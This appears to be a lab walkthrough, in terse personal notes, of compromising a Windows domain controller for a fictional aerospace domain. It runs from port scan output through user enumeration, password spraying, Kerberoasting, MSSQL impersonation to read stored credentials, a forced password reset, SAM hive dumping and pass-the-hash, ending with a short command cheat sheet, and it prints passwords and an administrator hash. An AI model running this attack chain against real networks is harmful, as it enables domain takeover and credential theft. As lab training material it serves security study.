PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-04-20 01:35:21Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
|_ssl-date: 2026-04-20T01:36:17+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=dc.hokkaido-aerospace.com
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.hokkaido-aerospace.com
| Issuer: commonName=hokkaido-aerospace-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-07T13:54:18
| Not valid after:  2024-12-06T13:54:18
| MD5:   fd8f:1b08:1ee3:af12:e450:0c81:e458:9a0b
|_SHA-1: 9b94:20e0:ea8b:7d6d:c1fa:4976:5547:cd45:3115:3414
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.hokkaido-aerospace.com
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.hokkaido-aerospace.com
| Issuer: commonName=hokkaido-aerospace-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-07T13:54:18
| Not valid after:  2024-12-06T13:54:18
| MD5:   fd8f:1b08:1ee3:af12:e450:0c81:e458:9a0b
|_SHA-1: 9b94:20e0:ea8b:7d6d:c1fa:4976:5547:cd45:3115:3414
|_ssl-date: 2026-04-20T01:36:17+00:00; 0s from scanner time.
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2026-04-20T01:36:17+00:00; 0s from scanner time.
| ms-sql-ntlm-info: 
|   192.168.187.40:1433: 
|     Target_Name: HAERO
|     NetBIOS_Domain_Name: HAERO
|     NetBIOS_Computer_Name: DC
|     DNS_Domain_Name: hokkaido-aerospace.com
|     DNS_Computer_Name: dc.hokkaido-aerospace.com
|     DNS_Tree_Name: hokkaido-aerospace.com
|_    Product_Version: 10.0.20348
| ms-sql-info: 
|   192.168.187.40:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-02T02:13:54
| Not valid after:  2054-08-02T02:13:54
| MD5:   594a:702f:d421:ff2f:411d:d1ea:73f1:2c3f
|_SHA-1: f4ad:4152:6a70:f50b:ec47:5026:400f:8ffb:0dc3:5178
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
|_ssl-date: 2026-04-20T01:36:17+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=dc.hokkaido-aerospace.com
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.hokkaido-aerospace.com
| Issuer: commonName=hokkaido-aerospace-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-07T13:54:18
| Not valid after:  2024-12-06T13:54:18
| MD5:   fd8f:1b08:1ee3:af12:e450:0c81:e458:9a0b
|_SHA-1: 9b94:20e0:ea8b:7d6d:c1fa:4976:5547:cd45:3115:3414
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.hokkaido-aerospace.com
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.hokkaido-aerospace.com
| Issuer: commonName=hokkaido-aerospace-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-07T13:54:18
| Not valid after:  2024-12-06T13:54:18
| MD5:   fd8f:1b08:1ee3:af12:e450:0c81:e458:9a0b
|_SHA-1: 9b94:20e0:ea8b:7d6d:c1fa:4976:5547:cd45:3115:3414
|_ssl-date: 2026-04-20T01:36:17+00:00; 0s from scanner time.
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-04-20T01:36:17+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=dc.hokkaido-aerospace.com
| Issuer: commonName=dc.hokkaido-aerospace.com
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-04-19T01:34:10
| Not valid after:  2026-10-19T01:34:10
| MD5:   ac06:7dbb:4f10:da31:3f00:8ecc:6c21:f12c
|_SHA-1: 495b:083c:1cc9:e89a:379a:d3e2:4012:2802:9bb2:5d4d
| rdp-ntlm-info: 
|   Target_Name: HAERO
|   NetBIOS_Domain_Name: HAERO
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: hokkaido-aerospace.com
|   DNS_Computer_Name: dc.hokkaido-aerospace.com
|   DNS_Tree_Name: hokkaido-aerospace.com
|   Product_Version: 10.0.20348
|_  System_Time: 2026-04-20T01:36:08+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found


$ kerbrute userenum -d hokkaido-aerospace.com /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt --dc 192.168.187.40 > validusers.txt -t 100
found valid users: 
info
administrator
discovery
maintenance

create custom password list. then run nxc smb 
found info:info 
smbclient -L 192.168.187.40 -U 'info'
	homes           Disk      user homes
        NETLOGON        Disk      Logon server share 
        SYSVOL

$ smbclient //192.168.187.40/homes -U "info" 
Password for [WORKGROUP\info]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Apr 20 11:57:59 2026
  ..                                DHS        0  Mon Apr 20 11:25:24 2026
  Angela.Davies                       D        0  Sat Nov 25 22:57:09 2023
  Annette.Buckley                     D        0  Sat Nov 25 22:57:09 2023
  Anthony.Anderson                    D        0  Sat Nov 25 22:57:09 2023
  Catherine.Knight                    D        0  Sat Nov 25 22:57:09 2023
  Charlene.Wallace                    D        0  Sat Nov 25 22:57:09 2023
  Cheryl.Singh                        D        0  Sat Nov 25 22:57:09 2023
  Deborah.Francis                     D        0  Sat Nov 25 22:57:09 2023
  Declan.Woodward                     D        0  Sat Nov 25 22:57:09 2023
  Elliott.Jones                       D        0  Sat Nov 25 22:57:09 2023
  Gordon.Brown                        D        0  Sat Nov 25 22:57:09 2023
  Grace.Lees                          D        0  Sat Nov 25 22:57:09 2023
  Hannah.O'Neill                      D        0  Sat Nov 25 22:57:09 2023
  Irene.Dean                          D        0  Sat Nov 25 22:57:09 2023
  Julian.Davies                       D        0  Sat Nov 25 22:57:09 2023
  Lynne.Tyler                         D        0  Sat Nov 25 22:57:09 2023
  Molly.Edwards                       D        0  Sat Nov 25 22:57:09 2023
  Rachel.Jones                        D        0  Sat Nov 25 22:57:09 2023
  Sian.Gordon                         D        0  Sat Nov 25 22:57:09 2023
  Tracy.Wood                          D        0  Sat Nov 25 22:57:09 2023
  Victor.Kelly                        D        0  Sat Nov 25 22:57:09 2023
  
$ smbclient //192.168.187.40/netlogon -U "info"
smb: \temp\> ls
  password_reset.txt
get to Kali, found Initial Password: Start123!
use the username list, password spray

$ nxc smb 192.168.187.40 -u users.txt -p 'Start123!'
[+] hokkaido-aerospace.com\discovery:Start123!

impacket-GetUserSPNs  -dc-ip  192.168.187.40 hokkaido-aerospace.com/discovery:Start123! -request

found user maintenance hash, but can't crack it.

impacket-mssqlclient  'hokkaido-aerospace.com/discovery':'Start123!'@192.168.187.40 -dc-ip 192.168.187.40 -windows-auth

SELECT name FROM sys.server_principals WHERE type_desc = 'SQL_LOGIN';
name             
--------------   
sa               
hrappdb-reader
SQL (HAERO\discovery  guest@master)> EXECUTE AS LOGIN = 'hrappdb-reader'
SQL (hrappdb-reader  guest@master)> SELECT * FROM hrappdb.INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE   
-------------   ------------   ----------   ----------   
hrappdb         dbo            sysauth      b'BASE TABLE'   
SQL (hrappdb-reader  hrappdb-reader@hrappdb)> select * from sysauth;
id   name               password           
--   ----------------   ----------------   
 0   b'hrapp-service'   b'Untimed$Runny'

still can't winrm or psexec in system.

bloodhound-python -u "hrapp-service" -p 'Untimed$Runny' -d HAERO -c all --zip -ns 192.168.187.40
Found hrapp-service has genericWrite Permission To Hazel.Green user which is Memberof tier2Admin group.
targetedKerberoast.py -v -d 'hokkaido-aerospace.com' -u 'hrapp-service' -p 'Untimed$Runny' --dc-ip 192.168.187.40
get password hash for Hazel.Green, crack it: haze1988
found that Hazel.Green is Memberof IT group, and Molly.Smith is tier1 Admin.

rpcclient -N  192.168.187.40 -U 'hazel.green%haze1988'
setuserinfo2 MOLLY.SMITH 23 'Password123!'

xfreerdp3 /u:molly.smith /p:'Password123!' /v:192.168.187.40 +clipboard
PS C:\Windows\system32> whoami
haero\molly.smith
PS C:\Windows\system32> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                         State
============================= =================================== ========
SeMachineAccountPrivilege     Add workstations to domain          Disablednet 
SeSystemtimePrivilege         Change the system time              Disabled
SeBackupPrivilege             Back up files and directories       Disabled
SeRestorePrivilege            Restore files and directories       Disabled

reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system
copy file to Kalinet
$ impacket-secretsdump -sam sam -system system local
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d752482897d54e239376fddb2a2109e4:::
$ evil-winrm -i 192.168.187.40 -u 'Administrator' -H 'd752482897d54e239376fddb2a2109e4'

################################################################################################
Mssql cmd. 
SELECT name FROM master..sysdatabases;
# list the names of all databases hosted on the MSSQL server

SELECT name FROM sys.server_principals WHERE type_desc = 'SQL_LOGIN';
# Check if there are any other users you can Impersonation within the database

SELECT * FROM sys.fn_my_permissions(NULL, 'SERVER') WHERE permission_name = 'IMPERSONATE ANY LOGIN';
* Check for Impersonation Rights.

rpcclient Command: setuserinfo2 <username> 23 <password>
Level 23: This specific level tells the Windows Domain Controller to set a new password for the target user using the permissions of the user you are currently logged in



